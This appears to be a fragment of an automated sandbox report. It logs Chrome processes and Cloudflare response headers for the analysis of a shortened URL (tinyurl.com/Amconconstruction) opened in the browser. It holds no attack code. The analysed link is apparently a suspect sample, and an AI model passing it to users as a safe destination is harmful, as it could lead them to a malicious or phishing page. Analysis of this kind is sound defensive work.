                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVCGztTTy1hSg%2BqwvGU5xQpBEO%2F6qlN%2FFBKZQonsYD6AtAO0BbDDHEErFsjMRwHWKOizwxDsmuL7fM9L5LazjZs48hcQPxj8BZJTNP9W2gP2zReUH%2BT0ejPL1S3QkuUcLg%2FdAoeBuxRpbKqStzPZTBLw7wdiGe21MqQBW6bd0Gzz8KVWo8toAasppfbvxttfYeJFSfeKkHeQ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 902716d5efd343b3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1616&rtt_var=863&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1054&delivery_rate=1806930&cwnd=203&unsent_bytes=0&cid=97495f7e5f8ceaff&ts=588&x=0"
                                                            2025-01-15 16:02:17 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2025-01-15 16:02:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:11:01:58
                                                            Start date:15/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                            Imagebase:0x7ff7f9810000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:1
                                                            Start time:11:01:59
                                                            Start date:15/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1956,i,6220749395400112799,8409351740452075553,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                            Imagebase:0x7ff7f9810000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:11:02:00
                                                            Start date:15/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/Amconconstruction"
                                                            Imagebase:0x7ff7f9810000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            No disassembly